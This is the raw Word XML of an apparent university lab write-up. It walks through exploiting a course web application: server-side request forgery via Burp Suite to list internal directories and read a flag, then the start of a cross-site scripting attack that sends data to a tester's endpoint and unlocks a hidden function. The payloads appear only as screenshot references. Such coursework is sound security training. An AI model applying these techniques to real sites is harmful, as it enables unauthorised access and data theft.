                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F43637" w14:paraId="1CCDE36A" w14:textId="77777777" w:rsidTr="008B0F50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AC79CFB" w14:textId="70EF0695" w:rsidR="00F43637" w:rsidRDefault="00F43637" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70D925C7" w14:textId="7CC17DC7" w:rsidR="00F43637" w:rsidRDefault="0020694D" w:rsidP="00EC2AD2">
            <w:r>
              <w:t>In Burp Suite, send the request in step1 to repeater. Change the header as:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46DE044D" w14:textId="11BCF9FD" w:rsidR="0020694D" w:rsidRDefault="005D55FA" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19CF2A4A" wp14:editId="4D3BD534">
                  <wp:extent cx="2113280" cy="310101"/>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8470" cy="310863"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A0F1297" w14:textId="09CF7725" w:rsidR="00F43637" w:rsidRDefault="0020694D" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">n Burp Suite, we can get </w:t>
            </w:r>
            <w:r w:rsidR="005D55FA">
              <w:t>such</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> response:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E8ED22E" w14:textId="57F03CB4" w:rsidR="005D55FA" w:rsidRDefault="005D55FA" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3655A8E5" wp14:editId="0F3D3B6D">
                  <wp:extent cx="3103245" cy="443865"/>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3245" cy="443865"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E57E3E0" w14:textId="36A431C0" w:rsidR="005D55FA" w:rsidRDefault="005C60C2" w:rsidP="0020694D">
            <w:r>
              <w:t xml:space="preserve">According to the content in “a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>href</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>”, t</w:t>
            </w:r>
            <w:r w:rsidR="005D55FA">
              <w:t xml:space="preserve">here are </w:t>
            </w:r>
            <w:r w:rsidR="006F6E6C">
              <w:t>documents/, random/, and storage/ on this port.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F43637" w14:paraId="6EDB9480" w14:textId="77777777" w:rsidTr="008B0F50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="219A2796" w14:textId="1CDC83AF" w:rsidR="00F43637" w:rsidRDefault="00F43637" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F349F11" w14:textId="30E72B91" w:rsidR="006F6E6C" w:rsidRDefault="006F6E6C" w:rsidP="00EC2AD2">
            <w:r>
              <w:t>Add documents/ behind the request header as:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79473830" w14:textId="77777777" w:rsidR="00F43637" w:rsidRDefault="005D55FA" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CB69B0E" wp14:editId="4536AEA1">
                  <wp:extent cx="2113280" cy="238539"/>
                  <wp:effectExtent l="0" t="0" r="127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26042" cy="239980"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="31ED634F" w14:textId="0BE8F7ED" w:rsidR="006F6E6C" w:rsidRDefault="006F6E6C" w:rsidP="00EC2AD2">
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
            <w:r>
              <w:t>ou can also have a try to add others</w:t>
            </w:r>
            <w:r w:rsidR="005C60C2">
              <w:t xml:space="preserve"> instead</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, such as random/ or storage/, but </w:t>
            </w:r>
            <w:r w:rsidR="005C60C2">
              <w:t xml:space="preserve">flag is not </w:t>
            </w:r>
            <w:r>
              <w:t>there. Same in the next steps.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B07A1EA" w14:textId="19E3FD50" w:rsidR="006F6E6C" w:rsidRDefault="006F6E6C" w:rsidP="00EC2AD2">
            <w:r>
              <w:t>Send request and get such response:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16947D92" wp14:editId="51B10BC9">
                  <wp:extent cx="2873660" cy="898497"/>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1534" cy="910339"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F43637" w14:paraId="07E767BF" w14:textId="77777777" w:rsidTr="008B0F50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78DCF47F" w14:textId="52B4864C" w:rsidR="00F43637" w:rsidRDefault="00F43637" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3857E9A7" w14:textId="77777777" w:rsidR="00F43637" w:rsidRDefault="006F6E6C" w:rsidP="00EC2AD2">
            <w:r>
              <w:t>Add background-checks/ behind the request as:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F9CB208" w14:textId="67D66833" w:rsidR="006F6E6C" w:rsidRDefault="006F6E6C" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2768652A" wp14:editId="024157DB">
                  <wp:extent cx="2113280" cy="326004"/>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6400" cy="326485"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="263A4578" w14:textId="77777777" w:rsidR="00F43637" w:rsidRDefault="006F6E6C" w:rsidP="00EC2AD2">
            <w:r>
              <w:t>Send request and get such response:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4966CD86" w14:textId="74C2E89C" w:rsidR="006F6E6C" w:rsidRDefault="006F6E6C" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74628C2C" wp14:editId="75EA8510">
                  <wp:extent cx="2989690" cy="805081"/>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1459" cy="808250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C60C2" w14:paraId="30214B0A" w14:textId="77777777" w:rsidTr="008B0F50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="661CBA9D" w14:textId="08487C3A" w:rsidR="005C60C2" w:rsidRDefault="005C60C2" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C091A0A" w14:textId="4A6CAC1C" w:rsidR="005C60C2" w:rsidRDefault="005C60C2" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:t>dd sensitive/ in request as:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77300B73" w14:textId="047A2CBC" w:rsidR="005C60C2" w:rsidRDefault="005C60C2" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E12DA46" wp14:editId="55FE945D">
                  <wp:extent cx="2150676" cy="318052"/>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479" cy="326748"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="093422A2" w14:textId="08B01EFB" w:rsidR="005C60C2" w:rsidRDefault="005C60C2" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67A148F1" wp14:editId="31782383">
                  <wp:extent cx="3103245" cy="1011555"/>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3245" cy="1011555"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C60C2" w14:paraId="333E32E3" w14:textId="77777777" w:rsidTr="008B0F50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69DDA324" w14:textId="74330860" w:rsidR="005C60C2" w:rsidRDefault="005C60C2" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EAC93CA" w14:textId="77777777" w:rsidR="005C60C2" w:rsidRDefault="005C60C2" w:rsidP="00EC2AD2">
            <w:r>
              <w:t>Add flag.txt behind the request as:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76C87E88" w14:textId="44CF93B1" w:rsidR="005C60C2" w:rsidRDefault="005C60C2" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A61B561" wp14:editId="7A8415AA">
                  <wp:extent cx="2162755" cy="32575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0934" cy="328493"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DF8CF1C" w14:textId="77777777" w:rsidR="005C60C2" w:rsidRDefault="005C60C2" w:rsidP="00EC2AD2">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>ow, we get the flag:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04AB1B2D" w14:textId="6D746183" w:rsidR="005C60C2" w:rsidRDefault="005C60C2" w:rsidP="00EC2AD2">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24CDD4FB" wp14:editId="0770545D">
                  <wp:extent cx="3103245" cy="222250"/>
                  <wp:effectExtent l="0" t="0" r="190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3245" cy="222250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F849B7E" w14:textId="42BC4457" w:rsidR="00FE41E0" w:rsidRDefault="00FE41E0" w:rsidP="00EC2AD2"/>
    <w:p w14:paraId="2F1DB46B" w14:textId="3ACF5F8C" w:rsidR="00C10E9D" w:rsidRDefault="00DA1798" w:rsidP="00C10E9D">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Content and result of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B0F50">
        <w:t>SsrfScript.ipynb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE41E0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5167EC0C" wp14:editId="34E40982">
            <wp:extent cx="4572000" cy="2909088"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>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53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4600003" cy="2926906"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B7D187" w14:textId="5C89C479" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="0088572A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc71488358"/>
      <w:bookmarkStart w:id="45" w:name="A2_s3"/>
      <w:r w:rsidRPr="002C3D4B">
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3D4B">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>Cross-Site Scripting</w:t>
      </w:r>
      <w:r w:rsidRPr="002C3D4B">
        <w:t xml:space="preserve"> Exploitation Walkthrough</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="2C433558" w14:textId="77777777" w:rsidR="002917EE" w:rsidRDefault="002917EE" w:rsidP="00C10E9D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:p w14:paraId="73EDE9FA" w14:textId="5A6A5262" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r w:rsidRPr="002C3D4B">
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS injection vulnerability lies in the web application’s Anonymous Question functionality. This can be accessed by authenticated users from ether the find page (</w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidRPr="001A1335">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>http://assignment-hermes.unimelb.life/question.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) or the </w:t>
      </w:r>
      <w:r w:rsidR="00ED3F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anonymous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bar at the top right of every internal page (or the right-hand side menu bar when the browser window has been </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">reduced to a certain size). To find the XSS vulnerability, you can copy the content in file XSS1.txt (the content can also be found at end of this section, remember to replace the URL with your own endpoint), paste into the input box in Anonymous Question page, after submitting, the endpoint will receive information, thus XSS can be explored through this input box. Based on information disclosure occurred on </w:t>
      </w:r>
      <w:r w:rsidR="00ED3F37">
        <w:t>User P</w:t>
      </w:r>
      <w:r>
        <w:t>rofile page (</w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidRPr="001A1335">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>http://assignment-hermes.unimelb.life/profile.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>), the XSS can lead to leakage of sensitive information, such as a flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09361608" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00C10E9D">
      <w:r w:rsidRPr="00EC2AD2">
        <w:t>Exploit 1: Leaking sensitive information (</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2AD2">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2AD2">
        <w:t>. the flag)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="562"/>
        <w:gridCol w:w="3686"/>
        <w:gridCol w:w="4771"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C10E9D" w14:paraId="6F965C05" w14:textId="77777777" w:rsidTr="00D80887">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AF7EE45" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRPr="00001738" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00001738">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TEP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="147CC435" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRPr="00001738" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00001738">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00001738">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4771" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="117FD18A" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRPr="00001738" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00001738">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00001738">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>xplanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C10E9D" w14:paraId="7883C7B6" w14:textId="77777777" w:rsidTr="00D80887">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76551131" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38817BDD" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:t>fter login, visit the profile page (</w:t>
            </w:r>
            <w:hyperlink r:id="rId56" w:history="1">
              <w:r w:rsidRPr="001A1335">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://assignment-hermes.unimelb.life/profile.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">), notice that the state of “On Probation?” is “yes”, and button “Pass Probation” is not active. View the page source code, we can find the parts about </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pass_probation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4771" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A7998E3" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D43E295" wp14:editId="50583F20">
                  <wp:extent cx="3190903" cy="1158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2697" cy="166779"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="05EB20DF" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:r>
              <w:t xml:space="preserve">In line 58, it shows that button “Pass Probation” should invoke function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pass_probation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(), but it is disabled.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2858CDC6" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="647A9606" wp14:editId="4DDA577E">
                  <wp:extent cx="3218815" cy="1097280"/>
                  <wp:effectExtent l="0" t="0" r="635" b="762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pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId58"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3299934" cy="1124933"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DAF8B2" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:r>
              <w:t>From line 201</w:t>
            </w:r>
            <w:r w:rsidRPr="004C2FE3">
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> this part of code shows the content of function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pass_probation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(), what we need to do is to execute the code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C10E9D" w14:paraId="47639246" w14:textId="77777777" w:rsidTr="00D80887">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7291857A" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53BA9CF8" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:r>
              <w:t>Visit Anonymous Question page(</w:t>
            </w:r>
            <w:hyperlink r:id="rId59" w:history="1">
              <w:r w:rsidRPr="001A1335">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://assignment-hermes.unimelb.life/question.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t>), Copy the code form XSS2.txt and paste into the input box.(The content can also be found after this table, remember to replace the URL in the file with your own endpoint). After submitting, we have passed probation, and can find the flag in User Profile page(</w:t>
            </w:r>
            <w:hyperlink r:id="rId60" w:history="1">
              <w:r w:rsidRPr="001A1335">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://assignment-hermes.unimelb.life/profile.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t>).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3924B57A" w14:textId="77777777" w:rsidR="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="00D80887">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
